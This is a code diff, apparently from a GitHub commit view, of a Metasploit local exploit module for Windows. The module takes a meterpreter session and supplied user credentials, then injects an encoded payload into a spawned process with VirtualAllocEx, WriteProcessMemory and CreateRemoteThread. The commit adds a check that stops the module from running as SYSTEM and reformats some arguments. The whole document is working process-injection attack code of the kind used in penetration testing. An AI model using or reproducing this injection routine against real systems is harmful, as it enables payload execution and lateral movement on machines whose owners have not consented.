88
99class Metasploit3 < Msf ::Exploit ::Local
1010 include Msf ::Post ::Windows ::Runas
11+ include Msf ::Post ::Windows ::Priv
1112
1213 def initialize ( info = { } )
1314 super ( update_info ( info ,
@@ -49,7 +50,7 @@ def initialize(info = {})
4950
5051 def exploit
5152 fail_with ( Exploit ::Failure ::BadConfig , 'Must be a meterpreter session' ) unless session . type == 'meterpreter'
52-
53+ fail_with ( Exploit :: Failure :: NoAccess , 'Cannot use this technique as SYSTEM' ) if is_system?
5354 domain = datastore [ 'DOMAIN' ]
5455 user = datastore [ 'USER' ]
5556 password = datastore [ 'PASSWORD' ]
@@ -83,6 +84,7 @@ def exploit
8384
8485 vprint_status ( 'Injecting payload into target process' )
8586 raw = payload . encoded
87+
8688 process_handle = pi [ :process_handle ]
8789
8890 virtual_alloc = session . railgun . kernel32 . VirtualAllocEx ( process_handle ,
@@ -95,21 +97,21 @@ def exploit
9597 fail_with ( Exploit ::Failure ::Unknown , "Unable to allocate memory in target process: #{ virtual_alloc [ 'ErrorMessage' ] } ) if address == 0
9698
9799 write_memory = session . railgun . kernel32 . WriteProcessMemory ( process_handle ,
98- address ,
99- raw ,
100- raw . length ,
101- 4 )
100+ address ,
101+ raw ,
102+ raw . length ,
103+ 4 )
102104
103105 fail_with ( Exploit ::Failure ::Unknown ,
104106 "Unable to write memory in target process @ 0x#{ address . to_s ( 16 ) } #{ write_memory [ 'ErrorMessage' ] } ) unless write_memory [ 'return' ]
105107
106108 create_remote_thread = session . railgun . kernel32 . CreateRemoteThread ( process_handle ,
107- nil ,
108- 0 ,
109- address ,
110- nil ,
111- 0 ,
112- 4 )
109+ nil ,
110+ 0 ,
111+ address ,
112+ nil ,
113+ 0 ,
114+ 4 )
113115 if create_remote_thread [ 'return' ] == 0
114116 print_error ( "Unable to create remote thread in target process: #{ create_remote_thread [ 'ErrorMessage' ] } )
115117 else
0 commit comments